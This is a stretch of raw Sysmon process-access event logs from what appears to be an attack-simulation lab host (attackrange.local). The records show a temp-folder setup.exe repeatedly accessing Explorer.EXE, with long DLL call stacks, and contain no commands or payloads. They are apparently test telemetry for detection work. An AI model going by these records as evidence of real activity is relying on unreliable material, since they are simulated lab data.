:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015843Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015842Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015841Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015840Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015839Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015838Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015837Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015836Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015835Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015834Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015833Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015832Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015831Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015830Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015829Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015828Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015827Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.771{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015826Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
